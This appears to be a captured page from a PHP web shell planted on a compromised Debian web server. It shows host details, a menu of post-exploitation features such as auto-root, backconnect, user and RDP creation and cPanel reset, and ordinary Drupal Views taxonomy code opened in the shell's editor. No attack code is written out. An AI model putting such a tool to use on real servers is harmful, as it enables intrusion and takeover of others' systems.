Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 13.58.221.124
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
taxonomy /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_argument_taxonom...
601
B
-rw-r--r--
views_handler_argument_term_no...
1.41
KB
-rw-r--r--
views_handler_argument_term_no...
5.17
KB
-rw-r--r--
views_handler_argument_term_no...
1.49
KB
-rw-r--r--
views_handler_argument_vocabul...
659
B
-rw-r--r--
views_handler_argument_vocabul...
604
B
-rw-r--r--
views_handler_field_taxonomy.i...
2.64
KB
-rw-r--r--
views_handler_field_term_link_...
1.86
KB
-rw-r--r--
views_handler_field_term_node_...
5.07
KB
-rw-r--r--
views_handler_filter_term_node...
11.65
KB
-rw-r--r--
views_handler_filter_term_node...
3.52
KB
-rw-r--r--
views_handler_filter_vocabular...
554
B
-rw-r--r--
views_handler_filter_vocabular...
517
B
-rw-r--r--
views_handler_relationship_nod...
3.2
KB
-rw-r--r--
views_plugin_argument_default_...
5.14
KB
-rw-r--r--
views_plugin_argument_validate...
7.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handler_relationship_node_term_data.inc
<?php /** * @file * Definition of views_handler_relationship_node_term_data. */ /** * Relationship handler to return the taxonomy terms of nodes. * * @ingroup views_relationship_handlers */ class views_handler_relationship_node_term_data extends views_handler_relationship { function init(&$view, &$options) { parent::init($view, $options); // Convert legacy vids option to machine name vocabularies. if (!empty($this->options['vids'])) { $vocabularies = taxonomy_get_vocabularies(); foreach ($this->options['vids'] as $vid) { if (isset($vocabularies[$vid], $vocabularies[$vid]->machine_name)) { $this->options['vocabularies'][$vocabularies[$vid]->machine_name] = $vocabularies[$vid]->machine_name; } } } } function option_definition() { $options = parent::option_definition(); $options['vocabularies'] = array('default' => array()); return $options; } function options_form(&$form, &$form_state) { $vocabularies = taxonomy_get_vocabularies(); $options = array(); foreach ($vocabularies as $voc) { $options[$voc->machine_name] = check_plain($voc->name); } $form['vocabularies'] = array( '#type' => 'checkboxes', '#title' => t('Vocabularies'), '#options' => $options, '#default_value' => $this->options['vocabularies'], '#description' => t('Choose which vocabularies you wish to relate. Remember that every term found will create a new record, so this relationship is best used on just one vocabulary that has only one term per node.'), ); parent::options_form($form, $form_state); } /** * Called to implement a relationship in a query. */ function query() { $this->ensure_my_table(); $def = $this->definition; $def['table'] = 'taxonomy_term_data'; if (!array_filter($this->options['vocabularies'])) { $taxonomy_index = $this->query->add_table('taxonomy_index', $this->relationship); $def['left_table'] = $taxonomy_index; $def['left_field'] = 'tid'; $def['field'] = 'tid'; $def['type'] = empty($this->options['required']) ? 'LEFT' : 'INNER'; } else { // If vocabularies are supplied join a subselect instead $def['left_table'] = $this->table_alias; $def['left_field'] = 'nid'; $def['field'] = 'nid'; $def['type'] = empty($this->options['required']) ? 'LEFT' : 'INNER'; $query = db_select('taxonomy_term_data', 'td'); $query->addJoin($def['type'], 'taxonomy_vocabulary', 'tv', 'td.vid = tv.vid'); $query->addJoin($def['type'], 'taxonomy_index', 'tn', 'tn.tid = td.tid'); $query->condition('tv.machine_name', array_filter($this->options['vocabularies'])); if (empty($this->query->options['disable_sql_rewrite'])) { $query->addTag('term_access'); } $query->fields('td'); $query->fields('tn', array('nid')); $def['table formula'] = $query; } $join = new views_join(); $join->definition = $def; $join->construct(); $join->adjusted = TRUE; // use a short alias for this: $alias = $def['table'] . '_' . $this->table; $this->alias = $this->query->add_relationship($alias, $join, 'taxonomy_term_data', $this->relationship); } }
Close